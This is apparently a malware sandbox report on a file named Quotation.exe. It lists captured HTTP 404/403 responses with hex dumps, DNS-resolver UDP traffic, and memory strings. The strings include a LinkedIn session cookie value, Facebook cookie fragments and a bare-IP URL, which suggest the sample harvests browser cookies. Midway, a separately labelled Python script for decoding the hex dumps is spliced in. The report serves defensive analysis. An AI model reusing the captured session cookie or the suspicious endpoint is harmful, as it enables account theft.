        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 20 Mar 2023 14:03:15 GMTContent-Type: text/htmlContent-Length: 146X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdYQrHtU+9G4PHzBHMB5kZ7,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679320995.6336767487916045X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Mon, 20 Mar 2023 14:03:18 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 2963
            x-wix-request-id: 1679320998.14516330743316732
            Age: 0
            X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcMnWGpNP0rsGN0u3APhu6Y,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=,2d58ifebGbosy5xc+FRalmN1/3SRG5yXcm9oEDWWfcKT3Hk+VaQk6aeaHI10uKmBjoe2GMQJ/MdiMK4Y/vI70zoD/J5EGh6Blxaj+C27iYE=,2UNV7KOq4oGjA5+PKsX47PpAuGwGFDWggbLa+hP4SSpWd3xniMsr1HjrszKGvMzr,7npGRUZHWOtWoP0Si3wDp7WuSH68sZSiNuj4ZnGbshE=,xTu8fpDe3EKPsMR1jrheEOmA27ebscGHyebDaDPCk6Y=,9y9YchCOVZDNGbMpBN9Negp96aY2N8IibZ9K5eXGb33TMHBfks53g3Rgx32HwzPsWIHlCalF7YnfvOr2cMPpyw==
            Vary: Accept-Encoding
            server-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_g
            X-Content-Type-Options: nosniff
            Server: Pepyaka/1.19.10
            Via: 1.1 google
            Connection: close
            Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e
            Data Ascii: <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="n
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:06:01 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:06:03 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:06:06 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:06:08 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx/1.10.3
            Date: Mon, 20 Mar 2023 14:06:30 GMT
            Content-Type: text/html
            Content-Length: 62299
            Connection: close
            ETag: "627b7393-f35b"
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
            Data Ascii (decoded from the hex above; the report's own ASCII rendering of this row was cut off): <!DOCTYPE html><html lang="ru"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="HandheldFriendly" content="True" /> <meta name="MobileOptimized" content="320" /> <title>Витрина домена </title> <meta name="description" content="" /> <link rel="stylesheet" href="css/shopwindow.css"> <link rel="shortcut icon" href="img/favicon.svg" type="image/svg+xml"> <meta property="og:url" content="http://trade.webnames.ru"> <meta property="og:type" content="website"> <meta property="og:title" content="Домен продается"> <meta property="og:description" content=""> <meta property="og:image" content="http://trade.webnames.ru/img/og_image.png"></head><body> <div class="wrapper-main"> <div class="row"> <div class="col-lg-10 col-lg-push-1">
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            server: openresty/1.13.6.1
            date: Mon, 20 Mar 2023 14:06:43 GMT
            content-type: text/html
            content-length: 175
            connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:06:48 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:06:51 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 20 Mar 2023 14:07:01 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
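        Added example (my code, not part of the Joe Sandbox report): every 404 row above carries both a declared Content-Length and a hex dump of what the sandbox actually captured, and the sandbox cuts long dumps short. The script below rebuilds two of those rows as records (the nginx 404 at 14:06:01, whose 146-byte body is present in full, and the trade.webnames.ru 404 at 14:06:30, of which the report only holds the start of a 62299-byte body; its hex here is an abridged excerpt of the report's dump, DOCTYPE, html, head, charset and title lines only), decodes the hex, compares captured size against Content-Length so that a truncated capture is reported as truncated rather than as a mismatch, and pulls out the <title>, including the UTF-8 Cyrillic one. The record layout, field names and verdict labels are my own choices.

```python
import re

# Added example, not code from the Joe Sandbox report. Two "HTTP traffic detected"
# rows from the report, as records: the header block as the report lists it and the
# body as the report's "Data Raw" hex. The second body is an abridged excerpt of the
# report's dump (DOCTYPE, html, head, charset and title lines only), so it is short
# on purpose and stands in for a capture the sandbox truncated.
SAMPLE_ENTRIES = [
    {   # nginx 404 at 14:06:01, body carried in full
        "headers": (
            "HTTP/1.1 404 Not Found\r\nServer: nginx\r\n"
            "Date: Mon, 20 Mar 2023 14:06:01 GMT\r\nContent-Type: text/html\r\n"
            "Content-Length: 146\r\nConnection: close"
        ),
        "raw": (
            "3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 "
            "4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a "
            "3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f "
            "74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 "
            "3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c "
            "2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a"
        ),
    },
    {   # trade.webnames.ru 404 at 14:06:30, 62299-byte body only partly captured
        "headers": (
            "HTTP/1.1 404 Not Found\r\nServer: nginx/1.10.3\r\n"
            "Date: Mon, 20 Mar 2023 14:06:30 GMT\r\nContent-Type: text/html\r\n"
            "Content-Length: 62299\r\nConnection: close\r\nETag: \"627b7393-f35b\""
        ),
        "raw": (
            "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a "
            "3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a "
            "3c 68 65 61 64 3e 0a "
            "20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a "
            "20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 "
            "d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a"
        ),
    },
]


def parse_headers(text):
    """Split a response head into (status line, {lower-cased header name: value})."""
    lines = text.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def decode_raw(hex_text):
    """Turn the report's space-separated hex ('3c 68 ...') back into bytes."""
    return bytes.fromhex(hex_text)  # bytes.fromhex skips the whitespace for us


def check_entry(entry):
    """Compare the captured body with the declared Content-Length and extract <title>."""
    status, headers = parse_headers(entry["headers"])
    body = decode_raw(entry["raw"])
    declared = int(headers.get("content-length", "-1"))
    # A capture shorter than declared is what sandbox truncation looks like, so it is
    # labelled as such; a capture longer than declared would be the real anomaly.
    if declared < 0:
        verdict = "no-length"
    elif len(body) == declared:
        verdict = "complete"
    elif len(body) < declared:
        verdict = "truncated"
    else:
        verdict = "overlong"
    # utf-8 with replacement covers both the ASCII nginx page and the Cyrillic title.
    text = body.decode("utf-8", errors="replace")
    m = re.search(r"<title[^>]*>(.*?)</title>", text, re.S | re.I)
    return {
        "status": status,
        "server": headers.get("server"),
        "declared_length": declared,
        "captured_length": len(body),
        "verdict": verdict,
        "title": m.group(1).strip() if m else None,
    }


def check_all(entries=SAMPLE_ENTRIES):
    """Run the check over every record and return the results in order."""
    return [check_entry(e) for e in entries]


if __name__ == "__main__":
    for r in check_all():
        print(f'{r["server"]:<14} {r["status"]:<24} '
              f'{r["captured_length"]:>6}/{r["declared_length"]:<6} '
              f'{r["verdict"]:<9} title={r["title"]!r}')
```

        Run it as a script to get one line per response. The same check is worth running over every Data Raw row before quoting a body from this kind of report: a "truncated" verdict means the page the sample reached was only partly observed, so anything past the captured prefix (and any size-based comparison with other captures) is not supported by the dump.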
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 consecutive occurrences)
        Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: explorer.exe, 0000000C.00000002.26450887427.000000001391C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000004F7C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012B8C000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
        Source: control.exe, 0000000D.00000002.26404796231.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: control.exe, 0000000D.00000002.26404796231.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
        Source: control.exe, 0000000D.00000002.26404796231.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rompt","domain":"www.facebook.com"},{"applied_po equals www.facebook.com (Facebook)
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://23.83.160.2:88/tz.php?ref=
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://batit.aliyun.com/alww.html
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014AEA000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000614A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://browsehappy.com/
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: Quotation.exe, 0000000A.00000003.22205813176.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629243441.000000000323D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.21921625783.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629997172.0000000003233000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22628815000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758686717.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630408575.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Quotation.exe, 0000000A.00000003.22205813176.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629243441.000000000323D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.21921625783.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629997172.0000000003233000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22628815000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758686717.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630408575.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: explorer.exe, 0000000C.00000002.26446251562.00000000105A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23160917814.00000000105A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22676296155.00000000105A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24120801059.00000000105A7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicer
